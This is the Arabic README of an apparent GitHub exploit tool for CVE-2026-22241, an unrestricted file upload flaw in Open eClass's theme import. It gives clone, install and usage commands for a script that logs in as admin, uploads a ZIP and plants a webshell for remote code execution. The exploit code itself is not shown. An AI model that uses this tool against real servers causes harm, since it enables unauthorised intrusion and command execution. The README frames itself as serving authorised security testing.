
استغلال آلي لثغرة CVE-2026-22241، وهي ثغرة رفع ملفات غير مقيدة في Open eClass، تتيح تنفيذ الأوامر عن بُعد عبر قشرة ويب مع تنظيف تلقائي.
يستغل هذا السكربت ثغرة CVE-2026-22241 لأتمتة عملية تسجيل الدخول، وإنشاء ملف ZIP، ورفعه، وتوفير قشرة ويب (webshell) مباشرة على الخادم، ثم يقوم بإزالتها تلقائيًا بمجرد اكتمال الاستغلال.
ثغرة رفع ملفات غير مقيدة (Unrestricted File Upload) في وظيفة استيراد القوالب (Theme Import) في Open eClass (قبل الإصدار 4.2) تسمح لمهاجم يتمتع بصلاحيات إدارية بتحقيق تنفيذ عن بُعد للكود (RCE).
تفاصيل الثغرة
التثبيت
git clone https://github.com/Ashifcoder/CVE-2026-22241.git
cd CVE-2026-22241/
pip install -r requirements.txt
الاستخدام
python3 CVE-2026-22241.py -t http://127.0.0.1/openeclass -u admin -p adminpassword

مساعدة الخيارات
usage: CVE-2026-22241.py [-h] -t ECLASSURL -u USERNAME -p PASSWORD
Open eClass Unrestricted File Upload RCE Exploit [ CVE-2026-22241 ]
Example: CVE-2026-22241.py -t http://127.0.0.1/openeclass -u admin -p adminpassword
options:
-h, --help show this help message and exit
-t ECLASSURL, --eclassUrl ECLASSURL
Target URL of the Open eClass.
-u USERNAME, --username USERNAME
Admin Username for login.
-p PASSWORD, --password PASSWORD
Admin Password for login.
هذا السكربت مخصص للأغراض التعليمية واختبارات الأمان المصرح بها فقط. المؤلف غير مسؤول عن أي ضرر ناتج عن سوء استخدام هذه الأداة. استخدمها بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.